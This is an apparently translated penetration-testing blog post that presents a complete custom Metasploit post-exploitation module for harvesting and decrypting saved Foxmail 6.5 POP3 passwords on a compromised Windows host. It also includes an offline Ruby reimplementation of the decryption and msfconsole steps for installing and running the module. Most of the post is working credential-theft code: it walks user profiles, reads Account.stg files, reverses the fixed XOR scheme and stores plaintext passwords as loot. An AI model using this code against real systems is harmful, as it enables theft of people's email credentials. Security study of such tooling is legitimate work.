
Penetration Testing: A Custom Metasploit Post-Exploitation Module for Harvesting Login Credentials

Please cite the source when reposting: https://blog.csdn.net/l1028386804/article/details/86415478

Here we take attacking Foxmail 6.5 as the example: we will try to decrypt the stored login credentials and then save them to the database.

Note: the precondition for running this script is that we have already obtained System privileges on the target Windows host through a series of earlier penetration steps.

We write the script foxmail_decrypt_by_binghe.rb with the following content:

```ruby
##
# Author: binghe (冰河)
# Date: 2019-01-13
# Description: decrypts the stored login credentials of Foxmail 6.5
#
# How it works:
# 1. Enumerate the user profiles and locate each user's LocalAppData folder.
# 2. Append \VirtualStore\Program Files(x86)\Tencent\Foxmail\mail to that
#    location to build the full path of the mail folder.
# 3. List the folders under mail; each folder name is a mailbox user name,
#    for example [email protected] can be one folder under mail.
# 4. Look for the Account.stg file inside each account folder under mail.
# 5. Read Account.stg and find the hash stored under POP3Password.
# 6. Pass that value to the decrypt method to obtain the plaintext password.
# 7. Store the results in the database.
##

# Current framework versions load the module class as MetasploitModule
# (the older Metasploit3 name is no longer used).
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::File
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  def initialize(info = {})
    super(update_info(info,
      'Name'         => 'Foxmail 6.5 Credential Harvester',
      'Description'  => %q{
        This module Finds and Decrypts Stored Foxmail 6.5 Credentials
      },
      'License'      => MSF_LICENSE,
      'Author'       => ['binghe'],
      'Platform'     => ['Windows'],
      'SessionTypes' => ['Meterpreter']
    ))
  end

  # Module entry point
  def run
    profiles = grab_user_profiles
    counter = 0
    data_entry = ""
    profiles.each do |user|
      next unless user['LocalAppData']
      # Foxmail 6.5 keeps its per-account data under the VirtualStore mirror
      full_path = user['LocalAppData'] + "\\VirtualStore\\Program Files(x86)\\Tencent\\Foxmail\\mail"
      next unless directory?(full_path)
      print_good("Fox Mail Installed, Enumerating Mail Accounts")
      session.fs.dir.foreach(full_path) do |dir_list|
        # Every account folder is named after the mailbox address
        next unless dir_list =~ /@/
        counter += 1
        full_path_mail = full_path + "\\" + dir_list + "\\Account.stg"
        next unless file?(full_path_mail)
        print_good("Reading Mail Account #{counter}")
        file_content = read_file(full_path_mail).split("\n")
        file_content.each do |line|
          next unless line =~ /POP3Password/
          # Lines are key=value; strip the trailing carriage return
          hash_value = line.split("=")[1]
          if hash_value.nil? || hash_value.strip.empty?
            print_error("No Saved Password")
          else
            print_good("Decrypting Password for mail account: #{dir_list}")
            # Call the decryption routine
            decrypted_pass = decrypt(hash_value.strip, dir_list)
            data_entry << "Username:" + dir_list + "\t" + "Password:" + decrypted_pass + "\n"
          end
        end
      end
    end
    store_loot("Foxmail Accounts", "text/plain", session, data_entry, "Fox.txt", "Fox Mail Accounts")
  end

  # Decryption routine
  def decrypt(hash_real, dir_list)
    decoded = ""
    magic = [126, 100, 114, 97, 71, 111, 110, 126]
    fc0 = 90
    # Convert the hex string into bytes, two hex digits per byte
    b = hash_real.scan(/../).map(&:hex)
    b[0] = b[0] ^ fc0
    double_magic = magic + magic
    d = Array.new(b.length - 1)
    for i in 1..(b.length - 1) do
      d[i - 1] = b[i] ^ double_magic[i - 1]
    end
    e = Array.new(d.length)
    for i in 0..(d.length - 1) do
      if d[i] - b[i] < 0
        e[i] = d[i] + 255 - b[i]
      else
        e[i] = d[i] - b[i]
      end
      decoded << e[i].chr
    end
    print_good("Found Username #{dir_list} with Password: #{decoded}")
    return decoded
  end
end
```
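The decoding steps the module applies to POP3Password can be exercised outside Metasploit, which is useful for checking the routine before deploying it or for assessing whether an Account.stg file recovered during an investigation still holds recoverable credentials. The following is an added example, not code from the original post or from Metasploit; the Account.stg text and the hex value in it are constructed test data, and the keystream covers only 16 password bytes, exactly as in the module above.

```ruby
# Added example: offline harness for the Foxmail 6.5 POP3Password scheme.
MAGIC = [126, 100, 114, 97, 71, 111, 110, 126].freeze  # bytes of "~draGon~"
FC0   = 90                                             # mask for the first byte

# Decode one POP3Password hex value with the same steps as the module.
def foxmail_decrypt(hex)
  b = hex.scan(/../).map(&:hex)          # stored bytes, two hex digits each
  b[0] ^= FC0                            # first byte is XORed with 0x5a
  keystream = MAGIC * 2                  # module only covers 16 bytes
  (1...b.length).map do |i|
    d = b[i] ^ keystream[i - 1]          # strip the fixed XOR layer
    diff = d - b[i - 1]                  # subtract the previous stored byte
    (diff < 0 ? diff + 255 : diff).chr   # wrap exactly as the module does
  end.join
end

# Pull the POP3Password value out of Account.stg text (key=value lines,
# CRLF-terminated on Windows). Returns nil when no password is stored.
def extract_pop3_hash(stg_text)
  stg_text.each_line do |line|
    key, value = line.strip.split('=', 2)
    return value if key == 'POP3Password' && value && !value.empty?
  end
  nil
end

# Convenience wrapper: hash lookup plus decryption in one call.
def harvest(stg_text)
  h = extract_pop3_hash(stg_text)
  h ? foxmail_decrypt(h) : nil
end

# Constructed sample of an Account.stg file; 4AFE040519 encodes "pass".
SAMPLE_STG = "Account=user@example.com\r\n" \
             "POP3Host=pop.example.com\r\n" \
             "POP3Password=4AFE040519\r\n"

puts harvest(SAMPLE_STG) if $PROGRAM_NAME == __FILE__
```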

Then we upload the foxmail_decrypt_by_binghe.rb script to the /usr/share/metasploit-framework/modules/post/windows/gather/credentials directory on Kali.

Before running this script, we first use Metasploit's msftidy tool to check whether the script's syntax is correct.

Run the following command on the Kali command line:

/usr/share/metasploit-framework/tools/dev/msftidy.rb /usr/share/metasploit-framework/modules/post/windows/gather/credentials/foxmail_decrypt_by_binghe.rb

It prints nothing, which shows the script is correct.

Next, on the Kali command line, run the following commands:

meterpreter > background
msf > set SESSION 1
msf > use post/windows/gather/credentials/foxmail_decrypt_by_binghe
msf post(windows/gather/credentials/foxmail_decrypt_by_binghe) > show options

Module options (post/windows/gather/credentials/foxmail_decrypt_by_binghe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(windows/gather/credentials/foxmail_decrypt_by_binghe) > run